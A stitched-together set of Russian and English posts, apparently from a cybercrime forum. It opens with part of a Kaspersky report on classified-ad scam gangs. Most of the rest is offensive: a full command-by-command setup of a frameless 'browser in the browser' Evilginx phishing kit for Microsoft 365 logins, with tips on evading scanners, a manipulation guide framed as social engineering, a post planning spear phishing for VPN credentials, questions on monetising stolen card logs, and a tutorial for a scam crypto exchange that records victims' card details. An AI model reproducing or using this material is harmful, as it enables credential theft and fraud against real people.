content/uploads/sites/58/2024/05/24200744/Message_boards_in_scam_15.png)
Фишинговое объявление, нацеленное на обман покупателя. Для продавца страница
будет такой же, но вместо Pay на кнопке будет написано Receive
Когда пользователь переходит по фишинговой ссылке, воркеру приходит оповещение
в бот о зафиксированной активности жертвы. В этом оповещении мошеннику
предлагается проверить, находится ли жертва онлайн — то есть открыта ли у нее
в данный момент фишинговая ссылка — и при необходимости перейти в чат. Такие
уведомления созданы для упрощения задач воркера и для ускорения реагирования.
[![Оповещение о переходе по фишинговой
ссылке](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200810%2FMessage_boards_in_scam_16.png&hash=dcb7d539f969ee7cd771be7bf6f2c0a7)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200810/Message_boards_in_scam_16.png)
Оповещение о переходе по фишинговой ссылке
Когда жертва вводит данные карты, вбивер тут же списывает их, и в общий чат
группировки приходит уведомление о поступлении оплаты. В сообщении указывается
вся украденная сумма, а также информация о том, сколько денег получат вбивер и
воркер. Доля воркера автоматически зачисляется на его счет, указанный в
настройках бота. В сообщении от бота также присутствует имя пользователя,
который выплачивает воркеру прибыль. Это сделано для того, чтобы мошенник сам
не попал на обман бывали случаи, когда другие воркеры под видом оплаты
выманивали деньги у «коллег» или просили занять определенную сумму и не
возвращали ее.
[![Уведомление об
оплате](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200836%2FMessage_boards_in_scam_17.png&hash=56d5b6ebc93eeb26394b31c4b5484dbe)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200836/Message_boards_in_scam_17.png)
Уведомление об оплате
В конце дня в общий чат приходит оповещение о сумме, заработанной всей
группировкой за день, месяц и за все время. Исследуемая группировка была
создана в августе 2023 года. Первую прибыль она получила спустя 3 дня 17 часов
после создания. В то время количество воркеров составляло 2675 человек, а
касса проекта — 1458 $.
[![Сумма выплат группировки на февраль 2024 года
](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24201119%2FMessage_boards_in_scam_18.png&hash=45b68604d973a99970152394aab07c2e)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24201119/Message_boards_in_scam_18.png)
Сумма выплат группировки на февраль 2024 года
Мы подсчитали статистику по деятельности группировки за период с 01.02.2024 по 04.02.2024 включительно.
Страна| Сумма логов| Сумма профитов
---|---|---
Канада| 1084,999 CAD| 0 CAD
Швейцария| 50 431,17 CHF| 10 273 CHF
Франция| 850 EUR| 0 EUR
Австрия| 2900 EUR| 0 EUR
За четыре дня группировка заработала 10 273 CHF (более 1 070 000 рублей). При этом, если посмотреть на суммы логов, злоумышленники могли бы украсть более пяти миллионов рублей только со швейцарских карт. Почему этого не случилось? Основная причина — вбивер не работает с логами, сумма которых составляет меньше 300 CHF (31 000 рублей). Скорее всего, это связано с тем, что сумма профитов, полученных с таких логов, будет меньше затрат на ее вывод. Кроме того, снятие денег с карты увеличивает риск обнаружения, поэтому вбиверов интересуют только карты, на которых лежат большие суммы. Наконец, некоторые жертвы могли успеть заблокировать карты до того, как они попали в руки вбиверу, или же ввести некорректные данные, которые, однако, повлияли на общую сумму логов.
[![Лимит
вбивера](/proxy.php?image=https%3A%2F%2Fmedia.kasperskycontenthub.com%2Fwp-
content%2Fuploads%2Fsites%2F58%2F2024%2F05%2F24200901%2FMessage_boards_in_scam_19.png&hash=15aa9aa36a7135f327a5c3aa04324fd2)](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/05/24200901/Message_boards_in_scam_19.png)
Лимит вбивера
Страна| Количество логов
---|---
Швейцария| 65
Франция| 6
Австрия| 4
Канада| 4
Если смотреть по количеству полученных логов, то самым популярным направлением является Швейцария. На втором месте — Франция, а на третьем — Австрия и Канада.
Площадки| Количество логов| Сумма профитов
---|---|---
Facebook| 26| 0 CHF
Post.ch| 16| 3 887 CHF
Tutti.ch| 16| 2 434 CHF
Anibis.ch| 11| 3 952 CHF
Если рассматривать конкретные доски объявлений, пользователей которых злоумышленникам удалось обмануть, то самыми популярными площадками оказались Facebook, Post.ch и Tutti.ch. При этом логи с Facebook не принесли мошенникам никакой прибыли. Самой выгодной площадкой стала Anibis.ch, которая находится на четвертом месте по числу логов. На втором месте — Post.ch, на третьем — Tutti.ch.
Хотя мошенничество на досках объявлений автоматизировано и поставлено на конвейер, от него можно защититься.
Прошлое обсуждение метода (с фреймами, не везде работает на данный момент): https://xss.is/threads/68057/post-547281
Новый подход к методу "браузер в браузере" (BITB) без использования iframes, обходит все традиционные "фрейморезки" на стандартных страницах авторизации как у Microsoft.
Этот POC код написан для использования нового метода BITB с Evilginx и фишлетом для Microsoft Enterprise.
До погружения в тему автор рекомендует сначала ознакомиться с его выступлением на BSides 2023, где он впервые представил концепт с важными деталями как провести идеальную фишинговую атаку:
Представленный инструмент предназначен только для образовательных и исследовательских целей. Ниже будет продемонстрирован метод под названием "браузер в браузере" без использования iframe (BITB). Автор снимает с себя ответственность за любые последствия. Используйте метод только легально и этично, в контроллируемых средах для целей тестирования систем инфозащиты. Используя данный инструмент, вы соглашаетесь делать это ответственно с пониманием того, что вы несете все риски использования.
На протяжение последнего года автор экспериментировал с различными трюками, чтобы подготовиться к "идеальной" фишинг-атаке. Типичные "красные флаги", на которые людей обычно учат обращать внимание, это срочность (действия), угрозы (получателю), авторитет (ссылки), плохая грамматика (текста) и т. д. Следующая рекомендуемая вещь - проверить ссылку сайта, с которым идет взаимодействие, поэтому люди обычно очень осторожны в момент, когда их просят ввести чувствительные данные, такие как электронная почта или пароли.
В этот момент в игру вступает атака "браузер в браузере" (BITB). Впервые представленная широкой общественности @mrd0x, концепт BITB заключается в том, чтобы создавать правдоподобное окно браузера, внутри которого атакующий контролирует все содержимое (представляя фальшивый сайт в фрейме). Фальшивая строка ссылки в фальшивом окне браузера представляет собой реальную ссылку сайта, которую посетитель ожидает там увидеть. Вместе с таким инструментом как Evilginx такая атака становится идеальной для правдоподбного фишинга.
Но возникает проблема, потому что в последние месяцы-годы популярные сайты, такие как сервисы Microsoft реализовали различные маленький скрипты, так называемые "фреймо-убийцы" и "фрейморезалки", предназначение которых запретить iframe, которые могут служить для вывода проксированных сайтов, как в случае Evilginx.
В двух словах, Evilginx + BITB для сервисов Microsoft больше не работает. Как минимум не с BITB, основанным на iframe.
Организуем "браузер в браузере" без каких-либо iframe! Именно так.
Подразумевается, что мы будем сейчас использовать BITB с Evilginx на страницах авторизации таких сервисов как Microsoft.
Evilginx здесь только для примера, но вы можете использовать ту же концепцию с другими инструментами.
Фрейморезалки направлены в первую очередь на iframe, поэтому наша идея - воссоздать эффект BITB без использования iframes и без нарушения оригинальной структуры содержания проксированной страницы. Это может быть достигнуто путем инъекции скриптов и HTML помимо исходного контента, используя поиск (search) и замену (replace) (известные как substitutions), полагаясь всецело на трюки HTML/CSS/JS для достижения визуального эффекта. Мы также будем использовать еще один трюк под названием "теневой DOM" ("Shadow DOM") в HTML для размещения нашего контента на посадочной странице (фоном) таким образом, что он (контент) не будет взаимодействовать с проксированным содержимым, позволяя нам гибко использовать любую посадочную страницу с минимальными дополнительными JS скриптами.
Создайте локальную виртуалку Linux. (Я лично предпочитаю использовать Ubuntu 22 на VMWare Player или Parallels Desktop)
sudo apt update && sudo apt upgrade -y
Опционально:
Создайте нового пользователя Evilginx user и дайте ему привилегии sudo group:
sudo su
adduser evilginx
usermod -aG sudo evilginx
Проверьте, что этот пользователь evilginx состоит в группе sudo:
su - evilginx
sudo ls -la /root
Перейдите в пользовательскую домашнюю директорию (home dir):
cd /home/evilginx
(У вас теперь есть права sudo user и теперь мы можем провести наши эксперименты локально.)
Загрузите и соберите Evilginx: Official Docs
Скопируйте файлы Evilginx в /home/evilginx
Установите: Official Docs
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile
Добавляем: export PATH=$PATH:/usr/local/go/bin
source ~/.profile
Проверяем:
go version
Устанавливаем:
sudo apt install make
Собираем Evilginx:
cd /home/evilginx/evilginx2
make
Создаем новую директорию для нашей установки evilginx вместе с фишлетами и редиректорами:
mkdir /home/evilginx/evilginx
Копируем сборку, фишлеты и редиректоры:
cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx
cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors
cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets
Быстрый фикс для фаервола Ubuntu (спасибо @kgretzky)
sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx
В Ubuntu, если вы получили ошибку Failed to start nameserver on: :53, попробуйте отредактировать этот файл
sudo nano /etc/systemd/resolved.conf
редактировать/добавить строчку DNSStubListener
на no
>
DNSStubListener=no
затем
sudo systemctl restart systemd-resolved
Так как мы будем использовать Apache2 до Evilginx, нам нужно поставить листенер Evilginx на порт, отличный от 443.
nano ~/.evilginx/config.json
Поменяйте https_port
c 443
на 8443
Установите Apache2:
sudo apt install apache2 -y
Включите моды Apache2, которые мы будем использовать: (Мы также отключим модуль access_compat, потому что он иногда вызывает проблемы)
Code:Copy to clipboard
sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat
Запустите и включите Apache:
sudo systemctl start apache2
sudo systemctl enable apache2
Проверьте работу сети в Apache и VM - посетите IP-адрес виртуалки через браузер на хост-машине.
Установите git, если он еще не установлен:
sudo apt -y install git
Клонируйте репо автора:
git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb
Сделаем директории для страниц, которые мы будем показывать:
Code:Copy to clipboard
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary
Копируйте директории для каждой страницы:
sudo cp -r ./pages/home/ /var/www/
sudo cp -r ./pages/primary/ /var/www/
sudo cp -r ./pages/secondary/ /var/www/
Опционально: Удалите страницу по-умолчанию в Apache (не используется):
sudo rm -r /var/www/html/
Скопируйте фишлет О365 в директорию для фишлетов:
sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml
Опционально: Для того, чтобы использовать виджет Calendly на своем
аккаунте вместо установленного мной, перейдите на pages/primary/script.js
и
поменяйте CALENDLY_PAGE_NAME
и CALENDLY_EVENT_TYPE
.
Примечание для демо обфускации (Demo Obfuscation): Как я объясняю в видео,
я включил минимальную обфускацию для текстового содержимого, такого как ссылки
и заголовка в BITB. Вы можете открыть мой демо обфускатор в браузере, посетив
demo-obfuscator.html
. В настоящей атаке я бы очень рекомендовал
обфусцировать большие куски HTML кода, куда вы делаете инъекции, или
использовать JS трюки, чтобы предотвратить детекты и пометки в браузере.
Усовершенствованная версия, над которой работает автор, будет использовать
более продвинутые технологии, дабы сделать практически невозможным для
сканнеров сделать сигнатуры и определить BITB код, следите за новостями.
Так как мы запускаем все локально, мы должны сгенерировать самоподписанные SSL сертификаты для использования их через Apache. Для Evilginx сертификаты не требуются, так как мы запускаем его в режиме разработчика.
Мы будем использовать домен fake.com
ведующий на нашу локальную VM. Если вы
хотите использовать другой домен, будьте уверены, что вы поменяли его во всех
файлах (Файлы Apache conf, JS файлы и т.д.)
Создайте директорию и родительские директории, если они еще не созданы:
sudo mkdir -p /etc/ssl/localcerts/fake.com/
Сгенерируйте SSL сертификаты, используя конфиг OpenSSL:
Code:Copy to clipboard
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf
Поменяйте права для личного ключа:
sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem
Скопируйте разные файлы дополнений (substitution files) (это будет основа нашего метода):
sudo cp -r ./custom-subs /etc/apache2/custom-subs
Важное замечание: в это репо я включил два конфига дополнений (substitution) для Chrome на Mac и Chrome на Windows BITB. Оба имеют авто- детект и стили для светлого/темного режимов и они могут использоваться как базовые шаблоны, чтобы достичь тех же самых результатов для других браузеров и операционных систем. Так как я не включаю автоматически детект комбинаций браузера/ОС посетителей нашей фишинговой страницы, вам нужно будет реализовать его самим, исходя из своей собственной логики и задач.
Оба конфига файлов в /apache-configs/ одинаковые, с тем различием что разная директива Include использована для файла дополнения (substitution), который будет включен туда (в каждом файле 2 отсылки на него)
Code:Copy to clipboard
# Снимите комментарий с того файла, который вы хотите использовать и не забудьте перезагрузить Apache после любых изменений:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf
Для того, чтобы все сделать проще, автор включил две версии как два разных файла в следующем шаге.
Windows/Chrome BITB:
sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites- enabled/000-default.conf
Mac/Chrome BITB:
sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites- enabled/000-default.conf
Проведем тест конфигов Аpache, чтобы убедиться, что они не содержат ошибок:
sudo apache2ctl configtest
Перезагрузим Apache, чтобы применить изменения:
sudo systemctl restart apache2
Получим IP-адрес VM через ifconfig
и сохраним его где-нибудь для следующего
шага.
Теперь мы должны добавить несколько новых записей в наш файл hosts, чтобы
припарковать наш домен для этого теста - fake.com
, а также все сабдомены для
VM, на котором работают Apache и Evilginx.
В Windows:
Откройте Notepad как Администратор (Search > Notepad > правый клик > Run as Administrator)
Нажмите на опцию File (левый верхний угол) и скопируйте в адресную строку File Explorer:
C:\Windows\System32\drivers\etc\
Поменяйте тип файлов (правый нижний угол) на "All files".
Два раза нажмите на файл с именем hosts
В Mac:
Откройте терминал и введите следующее:
sudo nano /private/etc/hosts
Теперь отредактируйте следующие записи (замените [IP]
на IP-адрес вашей VM)
и вставьте в конец файла hosts:
Code:Copy to clipboard
# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section
Сохраните и закройте.
Теперь перезагрузите ваш браузер до перехода к следующему шагу.
Примечание: в Mac используйте следующую команду для сброса кэша DNS:
sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder
Демо выполнено с помощью предоставленного в наборе Evilginx фишлета Office 365
Enterprise. Чтобы получить записи host для другого фишлета, используйте
phishlet get-hosts [PHISHLET_NAME]
, но не забывайте заменить 127.0.0.1 на
реальный локальный IP-адрес вашей VM.
По причине того, что сейчас мы используем самоподписанные SSL сертификаты, при
посещении fake.com
наш браузер будет каждый раз предупреждать нас об этом,
поэтому нам нужно заставить нашу хост-машину доверять сертификационному
центру, что подписал наши SSL сертификаты.
Для этого шага просто проще следовать инструкциям с видео автора, но мы распишем суть здесь.
Откройте https://fake.com/
в вашем браузере Chrome.
Не обращайте внимания на предупреждение Unsafe Site и перейдите дальше на страницу.
Нажмите на иконку SSL > Details > Export CertificateIMPORTANT: Когда сохраняете, имя ДОЛЖНО заканчиваться на .crt, чтобы не было проблем при открытии в Windows.
Нажмите два раза > установите для текущего пользователя. НЕ выбирайте место по-умолчанию, вместо этого сохраните сертификат в специализированном хранилище: выберите "Trusted Route Certification Authorities".
On Mac: установите только для текущего пользователя > выберите "Keychain: login" И нажмите на "View Certificates" > details > trust > Always trust
Теперь ПЕРЕЗАГРУЗИТЕ ваш браузер
Вы должны теперь видеть страницу https://fake.com
без всяких SSL
предупреждений.
На этой стадии все должно быть готово, чтобы мы могли успешно запустить Evilginx, настроить фишлет, создать нашу приманку и протестировать ее.
Опционально: установить tmux (позволить поддерживать работу evilginx, даже если сесия в терминале закрыта. Особенно полезно на удаленном VM.)
sudo apt install tmux -y
Запустите Evilginx в режиме разработчика (используем tmux, чтобы не потерять сессию):
tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer
(Для пере-прикрепления к сессии tmux используйте tmux attach-session -t evilginx
)
Конфиг Evilginx:
config domain fake.com
config ipv4 127.0.0.1
ВАЖНО: настройте режим Evilginx Blacklist на NoAdd для избежания попадания процессов Apache в черный список, так как все запросы будут приходить от Apache, а не настоящего посетителя с IP.
blacklist noadd
Настроим Phishlet и приманку:
phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0
Скопируйте ссылку страницы-приманки и посетите ее в своем браузере (используйте гостевого пользователя в Chrome, чтобы избежать необходимость каждый раз удалять сохраненные данные и кэша между тестами).
Оригинальный BITB на фреймах от @mrd0x:https://github.com/mrd0x/BITB
Курс мастерства Evilginx от его создателя
@kgretzky:https://academy.breakdev.org/evilginx-mastery
Доклад автора на BSides 2023:
Как защитить Evilginx используя Cloudflare и обфускацию
HTML:<https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-
cloudflare-and-html-obfuscation>
Ресурсы Evilginx для Microsoft 365 от
@BakkerJan:https://janbakker.tech/evilginx-resources-for-microsoft-365/
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F6738f4399dd26520f5e6f86df11e01280cd220dbc8602da9e1cce09b81f03c30%2Fwaelmas%2Fframeless- bitb&hash=228c1c96f6443713fdfdaddc904cd854&return_error=1)
Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft and the use with Evilginx. ](https://github.com/waelmas/frameless-bitb?tab=readme-ov-file)
A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft and the use with Evilginx. - wa...
github.com
**
Обязательно ли делать площадку с буквальными отправками товаров или можно забить х#й и собрать фулл фейк просто для видимости наличия ?
Всем здравствуйте! С вами снова я, и сегодня я вам расскажу про СИ , и методы психологического воздействия на человека.
Содержание статьи:
1. Ввод
2. Как работает общение
**3. **Первое впечатление
4. Дружественные сигналы
5. Как убедить человека в чем либо
6. Сигналы заинтересованности
1. Ввод
Люди, в большинстве своем принципиально никак не изменились с первобытных
времен. То что позволяло выживать дикарям, сейчас преобрело более "высокий"
уровень,
но все же, осталось. Юные девушки выбирают не самого умного и перспективного
парня, а того кто проявляет мужественность, властность и силу, подобно тому
как самка
выбирала самого крепкого самца, способного обеспечить ей будущее и
безопасность, защитить ее во время беременности. Ибо есть старая установка,
что сила решает все.
Люди охотнее выберут своим вожаком того, кто будет демонстрировать силу, и
даст веру, решение своим подчиненным.
Социальная инженерия -- это искусство эксплуатации тех функций и констант
человеческой психики,
что бы из этого извлечь какую либо выгоду. Человек во многом схож с
компьютером, и компьютер мыслит по образу и подобию человека, но более просто
и четче.
Человек это большая нейронная сеть. "Создать" человека в коде, вопрос времени
и вопрос развития ИИ. Так же как и в коде, в мышлении человека есть баги.
Например то, что человек даже не подумает о том, что что то еще может
создавать угрозу. Например когда нужно попасть в офис какой ко компании, можно
представится
и выглядеть доставщиком пиццы. Люди будут ожидать поведение доставщика пиццы и
если вы будете ему соответствовать то люди будут и вправду думать
что кто то заказывал пиццу в ваш офис.
2. Как работает общение
Как мы поняли выше -- человек существо еще довольно близкое к первобытным
людям и созданиям. Давайте же в контексте этого разберем, зачем существует
общение.
Общение существовало раньше, только в целях выживания и жизни в племени, и
только сейчас у общения появляются новые высокоуровневые цели.
Общение позволяло искать союзника, с тем, с кем можно и на мамонта охотится, и
в разведку в тыл пойти. Общение это нечто большее чем слова.
Язык тела и его сигналы, зрительный контакт. Вы начинаете общение с человеком
задолго до того, как с ним заговорили. Мозг человека неприрывно сканирует
местность,
в попытках определить: опасно, хорошо или нейтрально ли что либо. Ваша задача,
организовать общение так, что бы человек не видел в вас угрозы, и увидел в вас
союзника.
Мы выбираем союзников по схожести, схожести в убеждениях, увлечениях. Мы
выбираем в союзников тех, кто заставляет чувствовать нас лучше, в наш век, это
преимущественно
психологическая благополучность, ощущение себя хорошим и стоящим. Нам нравятся
люди которые говорят то, что мы хотим слышать. Общение чаще всего это просто
перечисление
фактов и данностей, и в случае если они схожи или человек испытывает к ним
симпатию, то собеседник видит в вас союзника.
А вот работа людей в коллективах, это уже более сложный пример. Любой
коллектив это маленькое племя, базовые законы коллектива не изменились с
первобытных времен.
Говоря местным языком, класс "Коллектив" это наследник класса "Племя", со
своими фичами, но в целом не изменный с давних времен.
В коллективе как и в межличностных отношениях есть роли и социальные игры, эти
роли и игры имеют давнюю историю, и универсальны для всех людей. Карл Густав
Юнг называл это архетипами.
Например игра "Учитель - Ученик", "Родитель -- Ребенок", "Глава --
подчиненный" и много других. Когда человек плохо исполняет свою роль в игре,
нарушает ее правила, данные коллективом или авторитетами,
он чувствует вину. Вина это страх нереализации себя. Вина говорит: "Ты плохой
игрок! Тебе следует играть лучше!". Вина имеет роль дебаггера и отладчика в
коллективе.
Когда человек испытывает вину, уместно было бы предложить ему путь выхода из
этой вины, и тут вы понимаете, на какие действия я вам намекаю). Так же
человеку в кайф играть выданные ему роли.
Женщине нравится чувствовать себя женщиной, мужчине -- быть мужчиной.
3. Первое впечатление
Как говорилось, общение начинается с того момента, когда мозг человека заметил
вас. С этого момента, ваше поведение будет решать, идентифицирует ли вас мозг
человека как друга, угрозу или что то нейтральное.
Задайтесь вопросом: "Чего хочет этот человек?", "Какой человек бы мне сейчас
понравился, если бы я был бы этим человеком?", "Кто он и какие роли он
исполняет?".
**Правила хорошего первого впечатления
1. Выглядите уместно к ситуации.
**Уместность во внешнем виде и поведении будет восприниматся как дружественный
сигнал: "Я в теме", "Я с вами".
**2. Выглядите счастливым и уверенным
**Если вы выглядите благополучно, то по мнению подсознания человека ситуация
вокруг безопасная и благополучная для общения.
**3. Не следует вести себя угрожающе
**Ведите себя адекватно, относительно ситуации поймите что может угрожать
данному человеку. Если вы говорите с преступником -- не выглядите как
полицейский
Нарушение границ человека так же интерпритируется как угрожающее поведение.
Например если вы попробуйте пройти там где стоит охранник, без его одобрения,
то вы ведете себя враждебно,
потому что он тогда будет плохо играть свою роль охранника. Не смотрите долго
в глаза, будьте аккуратны с прикоосновениями.
**4. Посылайте дружественные сигналы
**О них я расскажу немного позже, а пока что просто запомните это правило.
**5. Сделайте так что бы собеседник чувстовал себя хорошо изза вас
**Стоит говорить так, что бы человек понравился сам себе. Человек должен
получать сильные и позитивные эмоции в вашей компании.
Первое впечатление сильнее всего решает, какие вы будете иметь дальше отношения с этим человеком.
4. Дружественные сигналы
Огромную роль в общении играют невербальные сигналы. Сейчас мы рассмотрим дружественные сигналы, которые вам следовало бы посылать собеседнику
Игра бровями
Первый сигнал, который вы должны подать при встрече. Чаще всего это пожимание
руки. Делайте это быстро и как будь то вы сами не знаете, что делаете это.
Если вам подают такой сигнал, то поздравляю. Собеседник хочет дружественного
общения с вами и настроен на беседу
Улыбка
Наверное, самый действенный и базовый сигнал, который сигнализирует что все в
порядке.
Сложность в том, что бы сделать настоящую улыбку. При настоящей улыбке,
работает вся мускулатура лица.
Подумайте сами, приятнее ли видеть лицо с улыбкой или без? Доверяете ли вы
больше человеку с улыбкой?
Сами поймете, в чем еффект этого выражения лица.
Наклон головы
Многие живые существа делают этот жест, показывая тем самым доверие. Наклон
головы оголяет сонную артерию,
что делает человека уязвимым. Люди любят когда им доверяют.
Посмотрите и почувствуйте, будете ли вы относится хорошо к данным людям?
5. Как убедить человека в чем либо
Для начала, нужно установить доверительные отношения. Нужно добится того, что
бы человек не только нас слушал, но и слышал.
Когда человек вам не доверяет, вы для него еще не имеете ценности, или вы в
конфликте с ним -- вы для него чужак и доверять он вам не будет, тем более что
то принимать от вас
Убеждайте, отталкиваясь от уже принятых суждений человека. Что бы переубедить
человека, оттолкнитесь от более важных ценностей, тех, которые он считает выше
чем предмет переубеждения.
Выставьте предмет переубеждения так, что бы он противоречил тем самым, более
важным ценностям.
Например, человек сильно верит в X и верит(относительно Х менее сильно) в Y.
Выставьте Y так, что бы оно противоречило Х.
Или наоборот, вам нужно убедить в чем то(Z): Тогда выствьте Z так, что бы оно
следовало ценностям X или по крайней мере не противоречило.
Так же за "Высшую ценность" можно брать какие то общепринятые нормы, нормы
общества в котором состоит человек. Выставьте так, что если бы человек верил
во что то,
он как будь то бы шел против группы/за группой. Играйте на социальной
конформности. Если человек морально не самый крепкий или осознанный, скорее
всего он подчинится мнению большинства.
Еще, мнение и позиция часто зависит от субьективного опыта, психологических
особенностей самой личности. Учитывайте это.
**6. Сигналы заинтересованности
Наклон корпуса в вашу сторону**
Говорит о том что человеку интерестно и он скорее всего близок к вашей точке
зрения, одобряет.
Направление ног
Давайте посмотрим на то же фото выше. Если ноги или колени собеседника
обращены к вам -- это хороший признак.
Если указывают куда то на выход -- то человек хочет закончить беседу как можно
скорее. Лучше смените тему либо стиль беседы.
Вообще, когда считываете невербальные сигналы то сначала поймите общий
контекст. Может быть причина в другом у этого жеста?
Кивки головой
Знак согласия и одобрения.
Завершение
Эта статья дает вам понимание того как работает человеческая психика. К
сожалению, я не уместить туда все, просто на просто
места не хватит, однако я показал вам основы и базовые принципы социальной
инженерии, принципа общения людей.
Основываясь на данной информации, придумывайте сами свои методы обольщения и
влияния, данное здесь -- конструктор для ваших нужд.
Желаю вам успехов, надеюсь я научил вас чему то новому!
Hello everyone, I want to share some images of something I'm doing, well I'm about to send spear phishing emails to a company, to steal VPN credentials, so I made a copy of their Cisco VPN website, and some code in go, to serve the website and receive the credentials by post, if you have any suggestions, tell them, I was planning to add a function to the server so that when it receives username:password it also sends them by telegram
Всем привет!
Поток логов с фишинга
Лог+пас+любые отп
Что с этим сделать можно?
Просто сендить не дает
Даже 1€ тестили
Мб мерчи какие-то искать?
Или только вещевуха сейчас актуальна?
также поток сс+отп есть
Хотелось бы самому разобраться и научиться
Заранее спасибо!
Был бы благодарен, кто смог бы поделится. Видел здесь один под erc был выложен, но интересует также bep и пр.
Доброго времени суток,
Хочу приобрести подписку у них, но перед этим хотел бы выслушать мнение тех кто имел дело с данным сервисом. Спасибо.
В данной статье я собираюсь впервые попробовать написать скам-обменник. Я
создавал на данном форуме тему с вопросом о том, какой функционал должен быть
у скам-обменника, к сожалению, никто так и не ответил, поэтому буду
ориентироваться лично на свое мнение о том, что мне могло бы понадобиться,
работая в данной теме.
Для начала нам нужно разобраться, что же нам понадобится из функционала, и вот
мой список:
Для чего нужен генератор кошельков? Генератор кошельков понадобится для того, чтобы при запуске программы выдавался каждый раз разный кошелек, если база данных очищена. Мне кажется, это намного удобнее, чем вручную создавать кошельки.
Для чего нужна база данных? В базу данных будут записываться данные, которые будет вводить будущая жертва, например: номер его карты, ФИО. Также туда будут записываться кошельки, которые будут генерироваться, а именно: приватный ключ, мнемоническая фраза, адрес кошелька, монета.
Генератор QR-кодов понадобится больше всего для визуала, но и практический функционал у него тоже будет иметься, а именно - сканирование адреса для оплаты.
Конвертер одной валюты в другую нам будет просто необходим, если вы хоть раз пользовались обменниками, то думаю, не нужно объяснять, для чего он нужен.
Мониторинг курса валют также нужен для визуала и просто потому, что он есть на многих обменниках.
На чем будет написан наш обменник?
Обменник будет написан на Python Flask, так как для меня это самый привычный и
простой способ. Также обязательно нужна адаптация под разные разрешения, чтобы
охват аудитории был не только с компьютеров, но и с телефонов, согласитесь, вы
бы не стали обменивать крипту на сайте, который на телефоне не влазит в экран.
Ну что, с функционалом мы разобрались, теперь начнем к реализации обменника.
Первым делом нам нужно написать сервер на Flask, для начала сервер будет
простейшим и просто будет состоять из одной HTML страницы и одного CSS файла
со стилями.
Чтобы начать написание кода, нам для начала потребуется скачать среду
разработки.
Теперь нам потребуется создать проект.
Создание виртуальной среды разработки
В открывшемся окне нашего проекта, в правом нижнем углу у вас скорее всего
будет написано "No Interpreter", нажимаем на эту надпись и выбираем "Add New
Interpreter", затем нажимаем на "Add Local Interpreter".
В открывшемся окне можно увидеть путь до папки, где будет создана виртуальная
среда разработки. Как правило, PyCharm автоматически выбирает папку проекта,
поэтому это поле нам скорее всего не придется трогать. Также есть второе поле,
в котором указан путь до Python. Мы выбираем путь до Python 3.11, такой же,
как у меня. Версия Python имеет значение, так как некоторые библиотеки могут
не работать на других версиях. Поэтому, чтобы избежать проблем в будущем,
советую использовать ту же версию, что и я. После того как вы указали нужные
пути, нажимайте "OK", и мы приступим к написанию сервера.
Написание сервера для нашего скам обменника
Первым делом заходим в наш main.py и прописываем вызов библиотеки Flask в
самом верху: from flask import Flask, render_template. Но просто так она не
начнет работать, сначала нужно скачать эту библиотеку.
Внизу интерфейса PyCharm находим кнопку "Terminal" и затем вводим туда команду
pip install flask.
Теперь начинам писать код который будет запускать наш сервер Flask.
Python:Copy to clipboard
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
if __name__ == '__main__':
app.run(debug=True)
Теперь разберем что этот код вообще делает.
Python:Copy to clipboard
@app.route('/')
Отвечает за маршрут к главной странице нашего обменника, то есть при вводе в браузере просто ссылки на наш обменник будет открываться страница index.html.
Python:Copy to clipboard
if name == 'main':
Отвечает за то, чтобы наша программа запускалась только в том случае, если мы запускаем именно этот файл, а не любой другой будущий файл Python, который может появиться у нас в проекте. Если так можно сказать, это метка того, что это основной файл нашего проекта, который и нужно будет запускать. Возможно определение не совсем верное, но я стараюсь объяснить как можно более доступно для тех кто вообще не шарит
Так как в Python файле нашего проекта указан index.html, нам необходимо его
создать. В проводнике нашего проекта нажимаем ПКМ, затем New и выбираем
Directory. Папку называем "templates", затем внутри созданной папки снова
нажимаем на New/HTML File и называем файл "index".
